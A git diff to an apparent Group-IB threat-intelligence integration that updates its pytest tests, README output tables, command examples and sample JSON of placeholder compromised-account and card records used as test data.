"suspicious_ip/scanner", + "malware/cnc", + "hi/threat", + "hi/threat_actor", + "apt/threat", + "apt/threat_actor", + "malware/malware", + "osi/public_leak", + "compromised/breached" +] + +@pytest.fixture(scope="function", params=COLLECTION_NAMES) def session_fixture(request): """ - Given: - - A list of collection names from the integration - - When: - - Using each collection name as a parameter to the session_fixture - - Then: - - The fixture creates the expected client for each collection name - """ - return request.param, Client(base_url='https://some.ru') + Fixture for creating a client instance specific to each collection name. - -def test_transform_function_on_dict(): - """ Given: - - A dictionary input to transform + - A list of predefined collection names that represent different types of data. When: - - Calling transform_function() on the input + - Each test function requests an instance of this fixture. Then: - - The nested dict is flattened as expected + - Returns a tuple with the current collection name and an instantiated Client object. + - The Client instance is configured to interact with the appropriate collection by connecting + to the integration's base URL, using authentication, and including necessary headers. """ - test_input = {'a': 1, 'b': {'c': 2}} - expected = {'a': 1, 'b c': 2} - actual, _ = transform_function(test_input) - assert actual == expected + return request.param, Client( + base_url="https://some-url.com", + auth=("example@example.com", "exampleAPI_TOKEN"), + verify=True, + headers={"Accept": "*/*"}, + ) -def test_transform_function_on_list(): +@pytest.fixture(scope="function") +def single_session_fixture(): """ - Given: - - A list input to transform - - When: - - Calling transform_function() on the input - - Then: - - The nested list is flattened as expected - """ - test_input = [{'a': 1}, {'b': 2}] - # expected = {} - actual, _ = transform_function(test_input) - assert actual == {} + Fixture for creating a generic client instance to be used across multiple tests. - -def test_transform_function_on_primitive(): - """ Given: - - A primitive input to transform + - No specific parameters; only a need for a Client object with common configuration. When: - - Calling transform_function() on the input + - A test requires a general Client instance without needing to specify a collection. Then: - - The nested primitive is flattened as expected + - Returns a Client instance configured with the base URL, authentication, and headers. + - The instance can be reused by any test that doesn't depend on a specific collection name. """ - test_input = 'test' - expected = {'': 'test'} - actual, _ = transform_function(test_input) - assert actual == expected + return Client( + base_url="https://some-url.com", + auth=("example@example.com", "exampleAPI_TOKEN"), + verify=True, + headers={"Accept": "*/*"}, + ) -def test_transform_function_returns_tuple(): +def test_fetch_incidents(mocker, session_fixture): """ + Test for verifying the behavior of the fetch_incidents_command function. + Given: - - A tuple input to transform + - session_fixture, which provides a client instance associated with a specific collection name. + - last_run, a dictionary representing the previous state of incident fetching. + - first_fetch_time, a string specifying the starting time frame for incident retrieval. When: - - Calling transform_function() on the input + - fetch_incidents_command() is invoked with the above parameters. Then: - - The nested tuple is flattened as expected + - Ensures that the command returns the correct types for next_run and incidents. + - Verifies that incidents is a list, as expected. + - This test validates that the command correctly retrieves incidents for each collection + and that the returned data structure matches the expected format. """ - test_input = {'a': 1} - actual = transform_function(test_input) - assert isinstance(actual, tuple) - assert len(actual) == 2 + collection_name, client = session_fixture + collection_name, client = session_fixture + mocker.patch.object(client, 'create_poll_generator', return_value=[COLLECTIONS_RAW_JSON[collection_name]]) + next_run, incidents = fetch_incidents_command( + client=client, + last_run={}, + first_fetch_time="3 days", + incident_collections=[], + max_requests=3, + hunting_rules=False + ) + assert isinstance(incidents, list) -def test_fetch_incidents(mocker, session_fixture): +def test_main_error(): """ + Test for verifying the error-handling behavior in the main() function. + Given: - - Mocked API responses for fetch_incidents - - last_run dict, first_fetch_time str, etc. + - A main() function configured to raise an exception when calling error_command. When: - - Calling fetch_incidents_command() + - The main function invokes error_command(), which is expected to trigger an error. Then: - - next_run and incidents have expected types - - Number of incidents matches mock response + - Ensures that a SystemExit exception is raised as expected. + - The test checks that the main function handles errors in a predictable and controlled + manner, allowing graceful exits during failure. """ - collection_name, client = session_fixture - mocker.patch.object(client, 'create_poll_generator', return_value=[RAW_JSON[collection_name]]) - next_run, incidents = fetch_incidents_command(client=client, - last_run={}, - first_fetch_time="3 days", - incident_collections=[], - requests_count=3) - assert isinstance(incidents, list) + with pytest.raises(SystemExit): + main()["error_command"]() # type: ignore -def test_main_error(): +def test_global_search_command(mocker, single_session_fixture): """ + Test for verifying the functionality of the global_search_command function. + Given: - - main() setup to raise an exception + - single_session_fixture provides a client instance for performing a search. + - A test_query dictionary with a "query" key specifying a search term, in this case, an IP address. When: - - Calling the error_command() via main() + - The global_search_command() function is called with the client and test_query arguments. Then: - - An exception is raised as expected - """ - with pytest.raises(Exception): - main()["error_command"]() - - -def test_global_search_command(mocker, session_fixture): - import GroupIBTIA - test_response = [{ - "apiPath": "suspicious_ip/open_proxy", - "label": "Suspicious IP :: Open Proxy", - "link": "", - "count": 14, - "time": 0.299055199, - "detailedLinks": None, - }] - - collection_name, client = session_fixture - mocker.patch.object(Client, '_http_request', return_value=test_response) - mocker.patch.object(GroupIBTIA, 'find_element_by_key', return_value=test_response) - test_query = {'query': 'test'} + - Ensures that the command’s outputs_prefix and outputs_key_field are correctly set to expected values. + - Verifies that the command returns the data structure with the correct outputs_key_field ("query"), + ensuring compatibility with other functions that depend on this structure. + - This test validates that the search command integrates smoothly with the client and returns + consistent output formatting. + """ + client = single_session_fixture + mocker.patch.object(client, 'search_proxy_function', return_value=SEARCH_RAW_JSON) + test_query = {"query": "8.8.8.8"} result = GroupIBTIA.global_search_command(client=client, args=test_query) assert result.outputs_prefix == "GIBTIA.search.global" assert result.outputs_key_field == "query" -def test_get_available_collections(mocker, session_fixture): +def test_get_available_collections(mocker, single_session_fixture): """ + Test for validating the get_available_collections_command function. + Given: - - Mock client with a mocked get_available_collections method + - single_session_fixture, which provides a client instance for retrieving available collections. When: - - Calling get_available_collections_command() + - The get_available_collections_command() function is invoked with the client instance. Then: - - Outputs prefix and key field are as expected - - Result outputs is a list - """ - import GroupIBTIA - collection_name, client = session_fixture - mocker.patch.object(Client, '_http_request', return_value=RAW_JSON) - mocker.patch.object(GroupIBTIA, 'find_element_by_key', return_value=RAW_JSON[collection_name]) - + - Verifies that the outputs_prefix is correctly set to "GIBTIA.OtherInfo", indicating that + the response data is categorized as general information. + - Checks that the outputs_key_field is "collections", matching the expected key for collections data. + - Ensures that the "collections" field in the output contains a list of collection names, as expected. + - This test confirms that the command accurately retrieves and formats the list of available + collections from the server response. + """ + client = single_session_fixture + mocker.patch.object(client, 'get_available_collections_proxy_function', return_value=[AVALIBLE_COLLECTIONS_RAW_JSON]) result = get_available_collections_command(client=client) assert result.outputs_prefix == "GIBTIA.OtherInfo" assert result.outputs_key_field == "collections" - assert isinstance(result.outputs['collections'], list) - - -def test_find_element_by_key_nested_dict(): - """ - Given: - - A nested input dict - - When: - - Calling find_element_by_key() with a nested key - - Then: - - The expected nested value is returned - """ - from GroupIBTIA import find_element_by_key - test_dict = {'a': {'b': 'value'}} - result = find_element_by_key(test_dict, 'a.b') - assert result == 'value' - - -def test_find_element_by_key_list(): - """ - Given: - - A list input - - When: - - Calling find_element_by_key() to get all values of a key - - Then: - - A list containing all values is returned - """ - from GroupIBTIA import find_element_by_key - test_list = [{'a': 'value1'}, {'a': 'value2'}] - result = find_element_by_key(test_list, 'a') - assert len(result) == 2 - assert 'value1' in result - assert 'value2' in result - - -def test_find_element_by_key_missing(): - """ - Given: - - An input dict without the specified key - - When: - - Calling find_element_by_key() with a missing key - - Then: - - None is returned as expected - """ - from GroupIBTIA import find_element_by_key - test_dict = {'a': 1} - result = find_element_by_key(test_dict, 'b') - assert result is None - - -def test_transform_some_fields_into_markdown(): - from GroupIBTIA import transform_some_fields_into_markdown - - collection_name = "osi/git_repository" - feed = { - "files": [ - { - "url": "https://example.com", - "dateCreated": "2023-10-16", - "revisions": { - "info": { - "authorEmail": "author@example.com", - "authorName": "John Doe", - "timestamp": 1234567890 - } - } - }, - # ... - ] - } - - expected_output = { - "files": "| URL | Author Email | Author Name | Date Created| TimeStamp |\n" - "| ---- | --------------- | ------------ | ----------- | ------------ |\n" - "| https://example.com | author@example.com | John Doe | 2023-10-16 | 1234567890 |\n" - } - - result = transform_some_fields_into_markdown(collection_name, feed) - - assert result == expected_output - - -def test_transform_some_fields_into_markdown_phishing_kit(): - from GroupIBTIA import transform_some_fields_into_markdown - - collection_name = "bp/phishing_kit" - feed = { - "downloadedFrom": [ - { - "date": "2023-10-16", - "url": "https://example.com", - "domain": "example.com", - "fileName": "phish.zip" - }, - # ... - ] - } - - expected_output = {'downloadedFrom': '| URL | File Name | Domain | Date |\n' - '| --- | --------- | ------ | ---- |\n' - '| https://example.com | phish.zip | example.com | ' - '2023-10-16 |\n'} - - result = transform_some_fields_into_markdown(collection_name, feed) - - assert result == expected_output - - -def test_transform_some_fields_into_markdown_public_leak(): - from GroupIBTIA import transform_some_fields_into_markdown - - collection_name = "osi/public_leak" - feed = { - "linkList": [ - { - "author": "John Doe", - "dateDetected": "2023-10-16", - "datePublished": "2023-10-15", - "hash": "abcdef123456", - "link": "https://example.com", - "source": "Example Source" - }, - # ... - ], - "matches": { - "Type1": { - "SubType1": ["Value1", "Value2"], - "SubType2": ["Value3"] - }, - "Type2": { - "SubType3": ["Value4"] - } - } - } - - expected_output = {'linkList': '| Author | Date Detected | Date Published | Hash | Link | Source |\n' - '| ------ | ------------- | -------------- | ---- |----- | ------ |\n' - '| John Doe | 2023-10-16 | 2023-10-15 | abcdef123456 | ' - '[https://example.com](https://example.com) | Example Source |\n', - 'matches': '| Type | Sub Type | Value |\n' - '| ---- | -------- | ----- |\n' - '| Type1 | SubType1 | Value1 |\n' - '| Type1 | SubType1 | Value2 |\n' - '| Type1 | SubType2 | Value3 |\n' - '| Type2 | SubType3 | Value4 |\n'} - - result = transform_some_fields_into_markdown(collection_name, feed) - - assert result == expected_output - - -def test_get_human_readable_feed(): - from GroupIBTIA import get_human_readable_feed - - collection_name = "TestCollection" - feed = { - "id": 123, - "field1": "value1", - "field2": "value2", - "field3": "value3" - } - - expected_output = ('### Feed from TestCollection with ID 123\n' - '|field1|field2|field3|id|\n' - '|---|---|---|---|\n' - '| value1 | value2 | value3 | 123 |') - - result = get_human_readable_feed(collection_name, feed) - - assert result.strip() == expected_output.strip() + assert isinstance(result.outputs["collections"], list) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/README.md index 88573756613d..08dd6a235605 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/README.md @@ -20,8 +20,13 @@ This integration was integrated and tested with version 1.0 of Group-IB Threat I | Colletions to fetch | Type\(s\) of incidents to fetch from the third party API. | False | | Incidents first fetch | Date to start fetching incidents from. | False | | Number of requests per collection | A number of requests per collection that integration sends in one faetch iteration \(each request picks up to 200 incidents\). If you face some runtime errors, lower the value. | False | +| Hunting Rules | To enable the collection of data using hunting rules, please select this parameter. | False | +## Note: + +Requests to the following collections come with the Hunting Rules parameter by default: `osi/git_repository, osi/public_leak, compromised/breached` + ## Commands You can execute these commands from the CLI, as part of an automation, or in a playbook. @@ -225,7 +230,7 @@ Command performs Group IB event lookup in compromised/account collection with pr >|client ipv4 ip|cnc cnc|cnc domain|cnc ipv4 asn|cnc ipv4 city|cnc ipv4 countryCode|cnc ipv4 countryName|cnc ipv4 ip|cnc ipv4 provider|cnc ipv4 region|cnc url|companyId|dateDetected|domain|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|id|login|malware id|malware name|malware stixGuid|oldId|password|portalLink|silentInsert|sourceType|stixGuid| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| 0.0.0.0 | | some.ru | AS1111 | Moscow | RU | Russian Federation | 11.11.11.11 | some.ru | Moscow | http://some.ru | -1 | 2020-02-22T01:21:03+00:00 | some.ru | A2 | 80 | 100 | red | red | 90 | 253b9a136f0d574149fc43691eaf7ae27aff141a | some.ru | 411ac9df6c5515922a56e30013e8b8b366eeec80 | PredatorStealer | 2f7650f4-bc72-2068-d1a5-467b688975d8 | 396792583 | @some@ | | 0 | Botnet | 8abb3aa9-e351-f837-d61a-856901c3dc9d | +>| 0.0.0.0 | <<<<>>>> | some.ru | AS1111 | Moscow | RU | Russian Federation | 11.11.11.11 | some.ru | Moscow | http://some.ru | -1 | 2020-02-22T01:21:03+00:00 | some.ru | A2 | 80 | 100 | red | red | 90 | 253b9a136f0d574149fc43691eaf7ae27aff141a | some.ru | 411ac9df6c5515922a56e30013e8b8b366eeec80 | PredatorStealer | 2f7650f4-bc72-2068-d1a5-467b688975d8 | 396792583 | @some@ | | 0 | Botnet | 8abb3aa9-e351-f837-d61a-856901c3dc9d | >### URL indicator @@ -250,7 +255,7 @@ Command performs Group IB event lookup in compromised/account collection with pr ### gibtia-get-compromised-card-info *** -Command performs Group IB event lookup in compromised/card collection with provided ID. +Command performs Group IB event lookup in compromised/card collection with provided ID (DEPR). #### Base Command @@ -700,7 +705,7 @@ Command performs Group IB event lookup in compromised/mule collection with provi >|account|cnc cnc|cnc domain|cnc ipv4 ip|cnc url|dateAdd|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|hash|id|malware id|malware name|malware stixGuid|oldId|organization name|portalLink|sourceType|stixGuid|type| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| 1111111111111111 | | some | 11.11.11.11 | http://some.ru | 2020-02-21T13:02:00+00:00 | A2 | 80 | 100 | red | amber | 30 | some | 50a3b4abbfca5dcbec9c8b3a110598f61ba90a99 | 5a2b741f8593f88178623848573abc899f9157d4 | Anubis | 7d837524-7b01-ddc9-a357-46e7136a9852 | 392993084 | Some | | Botnet | 2da6b164-9a12-6db5-4346-2a80a4e03255 | Person | +>| 1111111111111111 | <<<<>>>> | some | 11.11.11.11 | http://some.ru | 2020-02-21T13:02:00+00:00 | A2 | 80 | 100 | red | amber | 30 | some | 50a3b4abbfca5dcbec9c8b3a110598f61ba90a99 | 5a2b741f8593f88178623848573abc899f9157d4 | Anubis | 7d837524-7b01-ddc9-a357-46e7136a9852 | 392993084 | Some | | Botnet | 2da6b164-9a12-6db5-4346-2a80a4e03255 | Person | >### URL indicator @@ -724,7 +729,7 @@ Command performs Group IB event lookup in compromised/mule collection with provi ### gibtia-get-compromised-imei-info *** -Command performs Group IB event lookup in compromised/imei collection with provided ID. +Command performs Group IB event lookup in compromised/imei collection with provided ID (DEPR). #### Base Command @@ -891,7 +896,7 @@ Command performs Group IB event lookup in compromised/imei collection with provi >|client ipv4 asn|client ipv4 countryCode|client ipv4 countryName|client ipv4 ip|client ipv4 provider|cnc cnc|cnc domain|cnc ipv4 asn|cnc ipv4 countryCode|cnc ipv4 countryName|cnc ipv4 ip|cnc ipv4 provider|cnc url|dateDetected|device iccid|device imei|device imsi|device model|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|id|malware id|malware name|malware stixGuid|oldId|operator number|portalLink|sourceType|stixGuid| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| AS11111 | NL | Netherlands | 11.11.11.11 | Some Company | | some.ru | AS11111 | FR | France | 11.11.11.11 | Some | http://some.ru | 2020-02-11T03:12:43+00:00 | ~ | Some | ~ | Nexus S/2.3.7 ($$$Flexnet v.5.5) | A2 | 80 | 100 | red | red | 30 | 0c1426048474df19ada9d0089ef8b3efce906556 | 8790a290230b3b4c059c2516a6adace1eac16066 | FlexNet | b51140c2-a88b-a95c-f5b0-1c5d1855ffde | 396766002 | ~ | | Botnet | 9cff66e9-c2b3-26ca-771a-c9e4d501c453 | +>| AS11111 | NL | Netherlands | 11.11.11.11 | Some Company | <<<<>>>> | some.ru | AS11111 | FR | France | 11.11.11.11 | Some | http://some.ru | 2020-02-11T03:12:43+00:00 | ~ | Some | ~ | Nexus S/2.3.7 ($$$Flexnet v.5.5) | A2 | 80 | 100 | red | red | 30 | 0c1426048474df19ada9d0089ef8b3efce906556 | 8790a290230b3b4c059c2516a6adace1eac16066 | FlexNet | b51140c2-a88b-a95c-f5b0-1c5d1855ffde | 396766002 | ~ | | Botnet | 9cff66e9-c2b3-26ca-771a-c9e4d501c453 | >### URL indicator @@ -1306,7 +1311,7 @@ Command performs Group IB event lookup in osi/vulnerability collection with prov >|bulletinFamily|cvss score|cvss vector|dateLastSeen|dateModified|datePublished|description|displayOptions isFavourite|displayOptions isHidden|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|exploitCount|extCvss base|extCvss environmental|extCvss exploitability|extCvss impact|extCvss mImpact|extCvss overall|extCvss temporal|extCvss vector|extDescription|href|id|lastseen|modified|portalLink|provider|published|references|reporter|title|type| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| NVD | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | 2021-02-11T14:35:24+03:00 | 2021-02-11T00:45:00+03:00 | 2021-02-10T19:15:00+03:00 | Description | false | false | A1 | 100 | 100 | red | green | 30 | 0 | 9.8 | 0.0 | 3.9 | 5.9 | 0.0 | 9.8 | 0.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Big description | | CVE-2021-27152 | 2021-02-11T14:35:24+03:00 | 2021-02-11T00:45:00+03:00 | | some.ru | 2021-02-10T19:15:00+03:00 | ,
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27152 | some.ru | CVE-2021-27152 | cve | +>| NVD | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | 2021-02-11T14:35:24+03:00 | 2021-02-11T00:45:00+03:00 | 2021-02-10T19:15:00+03:00 | Description | false | false | A1 | 100 | 100 | red | green | 30 | 0 | 9.8 | 0.0 | 3.9 | 5.9 | 0.0 | 9.8 | 0.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Big description | <<<<>>>> | CVE-2021-27152 | 2021-02-11T14:35:24+03:00 | 2021-02-11T00:45:00+03:00 | | some.ru | 2021-02-10T19:15:00+03:00 | ,
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27152 | some.ru | CVE-2021-27152 | cve | >### softwareMixed table @@ -1318,7 +1323,7 @@ Command performs Group IB event lookup in osi/vulnerability collection with prov ### gibtia-get-phishing-kit-info *** -Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_kit collections with provided ID. +Command performs Group IB event lookup in bp/phishing_kit (DEPR) and attacks/phishing_kit collections with provided ID. #### Base Command @@ -1436,7 +1441,7 @@ Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_k ### gibtia-get-phishing-info *** -Command performs Group IB event lookup in bp/phishing and attacks/phishing collections with provided ID. +Command performs Group IB event lookup in bp/phishing and attacks/phishing collections with provided ID (DEPR). #### Base Command @@ -1918,7 +1923,7 @@ Command performs Group IB event lookup in attacks/deface collection with provide >|date|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|id|mirrorLink|portalLink|providerDomain|siteUrl|source|targetDomain|targetIp countryName|targetIp ip|threatActor id|threatActor isAPT|threatActor name|tsCreate|url| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| 2021-01-21T02:22:18+00:00 | B2 | 80 | 80 | orange | amber | 30 | 6009637a1135cd001ef46e21 | : | | some.ru | | some.ru | some.ru | Indonesia | 11.11.11.11 | d7ff75c35f93dce6f5410bba9a6c206bdff66555 | false | FRK48 | 2021-01-21T11:19:52+00:00 | http://some.ru | +>| 2021-01-21T02:22:18+00:00 | B2 | 80 | 80 | orange | amber | 30 | 6009637a1135cd001ef46e21 | : | | some.ru | <<<<>>>> | some.ru | some.ru | Indonesia | 11.11.11.11 | d7ff75c35f93dce6f5410bba9a6c206bdff66555 | false | FRK48 | 2021-01-21T11:19:52+00:00 | http://some.ru | >### URL indicator @@ -2638,7 +2643,7 @@ Command performs Group IB event lookup in suspicious_ip/socks_proxy collection w ### gibtia-get-malware-targeted-malware-info *** -Command performs Group IB event lookup in malware/targeted_malware collection with provided ID. +Command performs Group IB event lookup in malware/targeted_malware collection with provided ID (DEPR). #### Base Command @@ -2888,7 +2893,7 @@ Command performs Group IB event lookup in malware/cnc collection by provided ID. >|cnc|dateDetected|dateLastSeen|domain|id|oldId|stixGuid|url| >|---|---|---|---|---|---|---|---| ->| | 2021-04-25T13:37:23+00:00 | 2021-04-25T13:37:23+00:00 | some.ru | aeed277396e27e375d030a91533aa232444d0089 | 211146923 | 417b2644-1105-d65b-4b67-a78e82f59b65 | https://some.ru | +>| <<<<>>>> | 2021-04-25T13:37:23+00:00 | 2021-04-25T13:37:23+00:00 | some.ru | aeed277396e27e375d030a91533aa232444d0089 | 211146923 | 417b2644-1105-d65b-4b67-a78e82f59b65 | https://some.ru | >### ipv4 table diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/command_examples.txt b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/command_examples.txt index 385f218d1f6d..3d99171c8928 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/command_examples.txt +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/command_examples.txt @@ -1,22 +1,22 @@ !gibtia-get-available-collections !gibtia-get-compromised-account-info id=253b9a136f0d574149fc43691eaf7ae27aff141a -!gibtia-get-compromised-card-info id=ecda6f4dc85596f447314ce01e2152db9c9d3cbc +!gibtia-get-compromised-card-group-info id=ecda6f4dc85596f447314ce01e215 !gibtia-get-compromised-breached-info id=277c4112d348c91f6dabe9467f0d18ba -!gibtia-get-phishing-kit-info id=044f3f2cb599228c1882884eb77eb073f68a25f2 -!gibtia-get-phishing-info id=fce7f92d0b64946cf890842d083953649b259952 +!gibtia-get-phishing-group-info id=42a22d6c8d642ba628294b2c91acfe322ffe16dda3 !gibtia-get-osi-git-leak-info id=ead0d8ae9f2347789941ebacde88ad2e3b1ef691 !gibtia-get-osi-public-leak-info id=a09f2354e52d5fa0a8697c8df0b4ed99cc956273 -!gibtia-get-malware-targeted-malware-info id=5bbd38acf0b9e4f04123af494d485f6c49221e98 +!gibtia-get-osi-vulnerability-info id=CVE-2021-27152 +!gibtia-get-malware-malware-info id=83887a0fa2181a9a169ac65f5f6 !gibtia-get-compromised-mule-info id=50a3b4abbfca5dcbec9c8b3a110598f61ba90a99 -!gibtia-get-compromised-imei-info id=0c1426048474df19ada9d0089ef8b3efce906556 !gibtia-get-attacks-ddos-info id=26a05baa4025edff367b058b13c6b43e820538a5 !gibtia-get-attacks-deface-info id=6009637a1135cd001ef46e21 !gibtia-get-threat-info id=1b09d389d016121afbffe481a14b30ea995876e4 isAPT=true -!gibtia-get-suspicious-ip-tor-node-info id=109.70.100.46 -!gibtia-get-suspicious-ip-open-proxy-info id=cc6a2856da2806b03839f81aa214f22dbcfd7369 -!gibtia-get-suspicious-ip-socks-proxy-info id=02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e +!gibtia-get-threat-actor-info id=0d4496592ac3a0f5511cd62ef2988 isAPT=true +!gibtia-get-suspicious-ip-tor-node-info id=100.100.100.100 +!gibtia-get-suspicious-ip-open-proxy-info id=100.100.100.100 +!gibtia-get-suspicious-ip-socks-proxy-info id=100.100.100.100 +!gibtia-get-suspicious-ip-vpn-info id=100.100.100.100 +!gibtia-get-suspicious-ip-scanner-info id=100.100.100.100 !gibtia-get-malware-cnc-info id=aeed277396e27e375d030a91533aa232444d0089 -!gibtia-get-osi-vulnerability-info id=CVE-2021-27152 -!gibtia-get-threat-actor-info id=0d4496592ac3a0f5511cd62ef29887f48d9cb545 isAPT=true !gibtia-global-search query=100.100.100.100 -!gibtia-local-search collection_name=attacks/phishing query=100.100.100.100 \ No newline at end of file +!gibtia-local-search collection_name=attacks/phishing_group query=100.100.100.100 \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/avalible_collections_example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/avalible_collections_example.json new file mode 100644 index 000000000000..1b543190df0e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/avalible_collections_example.json @@ -0,0 +1,37 @@ +[ + "apt/threat", + "apt/threat_actor", + "hi/threat", + "hi/threat_actor", + "attacks/ddos", + "attacks/deface", + "attacks/phishing_group", + "attacks/phishing_kit", + "compromised/access", + "compromised/account_group", + "compromised/bank_card_group", + "compromised/breached", + "compromised/discord", + "compromised/masked_card", + "compromised/messenger", + "compromised/mule", + "compromised/reaper", + "malware/cnc", + "malware/config", + "malware/malware", + "malware/signature", + "malware/yara", + "osi/git_repository", + "osi/public_leak", + "osi/vulnerability", + "suspicious_ip/open_proxy", + "suspicious_ip/scanner", + "suspicious_ip/socks_proxy", + "suspicious_ip/tor_node", + "suspicious_ip/vpn", + "compromised/breached", + "compromised/account_group", + "compromised/reaper", + "compromised/bank_card_group", + "attacks/phishing_group" +] \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/example.json deleted file mode 100644 index 967a0523d7c2..000000000000 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/example.json +++ /dev/null @@ -1,684 +0,0 @@ -{ - "compromised/account_group":[ - [ - {"dateFirstCompromised": null, - "dateFirstSeen": "2022-10-20T18:12:28+00:00", - "dateLastCompromised": null, - "dateLastSeen": "2022-10-20T18:12:28+00:00", - "displayOptions": { - "favouriteForCompanies": [], - "hideForCompanies": [], - "isFavourite": false, - "isHidden": false - }, - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 100, - "severity": "red", - "tlp": "red", - "ttl": 30 - }, - "eventCount": 1, - "events": [ - { - "client": { - "ipv4": { - "asn": "ASN", - "city": "City", - "countryCode": "Code", - "countryName": "Country Name", - "ip": "11.11.11.11", - "provider": "provider", - "region": "region" - }, - "ipv6": null - }, - "cnc": { - "cnc": "https://some.ru", - "domain": "some.ru", - "ipv4": { - "asn": "ASN", - "city": "City", - "countryCode": "Code", - "countryName": "Country Name", - "ip": "11.11.11.11", - "provider": "provider", - "region": "region" - }, - "ipv6": null, - "url": "https://some.ru" - }, - "dateCompromised": null, - "dateDetected": "2022-10-20T18:12:28+00:00", - "id": "1111111111111111111111111111111111111111", - "malware": { - "category": [], - "class": null, - "id": "1111111111111111111111111111111111111111", - "name": "AZORult", - "platform": [], - "stixGuid": "1111111111111111111111111111111111111111", - "threatLevel": null - }, - "oldId": "11111111", - "person": null, - "source": { - "id": "", - "idType": "", - "type": "Botnet" - }, - "stixGuid": "1111111111111111111111111111111111111111", - "threatActor": null - } - ], - "id": "1111111111111111111111111111111111111111", - "login": "some@gmail.com", - "malware": [ - { - "category": [], - "class": null, - "id": "1111111111111111111111111111111111111111", - "name": "Name", - "platform": [], - "stixGuid": null, - "threatLevel": null - } - ], - "parsedLogin": { - "domain": "some.com", - "ip": null - }, - "password": "?", - "port": null, - "portalLink": null, - "seqUpdate": 1670823245323, - "service": { - "domain": "some.com", - "host": "some.com", - "ip": null, - "url": "https://some.ru" - }, - "source": [ - { - "id": "", - "idType": "", - "type": "Botnet" - } - ], - "sourceId": [], - "sourceType": [ - "Botnet" - ], - "threatActor": []} - ], - 1614919893874 - ], - "compromised/account": [ - [ - { - "botId": null, - "client": { - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": "0.0.0.0", - "provider": null, - "region": null - } - }, - "cnc": { - "cnc": "http://some.ru", - "domain": "some.ru", - "ipv4": { - "asn": "ASN", - "city": "City", - "countryCode": "Code", - "countryName": "Country Name", - "ip": "11.11.11.11", - "provider": "Provider", - "region": "Country" - }, - "ipv6": null, - "url": "http://some.ru" - }, - "dateCompromised": null, - "dateDetected": "2019-12-12T09:51:07+00:00", - "device": null, - "domain": "some.ru", - "dropEmail": { - "domain": null, - "email": "", - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": null, - "provider": null, - "region": null - } - }, - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 100, - "severity": "red", - "tlp": "red", - "ttl": 90 - }, - "id": "253b9a136f0d574149fc43691eaf7ae27aff141a", - "isFavourite": false, - "isHidden": false, - "login": "some@gmail.ru", - "malware": { - "id": "411ac9df6c5515922a56e30013e8b8b366eeec80", - "name": "PredatorStealer" - }, - "oldId": "396792583", - "password": "password", - "person": { - "address": null, - "birthday": null, - "city": null, - "countryCode": null, - "email": null, - "name": null, - "passport": null, - "phone": null, - "state": null, - "taxNumber": null, - "zip": null - }, - "port": null, - "portalLink": "https://bt.group-ib.com/cd/accounts?searchValue=id:253b9a136f0d574149fc43691eaf7ae27aff141a", - "seqUpdate": 1614919893874, - "sourceType": "Botnet", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "name TA" - } - } - ], - 1614919893874 - ], - "compromised/card": [ - [ - { - "baseName": "Name", - "cardInfo": { - "cvv": null, - "dump": null, - "issuer": { - "countryCode": "Code", - "countryName": "Country Name", - "issuer": "SOME BANK" - }, - "number": "545123XXXXXXXXXX", - "system": "VISA", - "type": "CLASSIC", - "validThru": "09/2025" - }, - "client": { - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": null, - "provider": null, - "region": null - } - 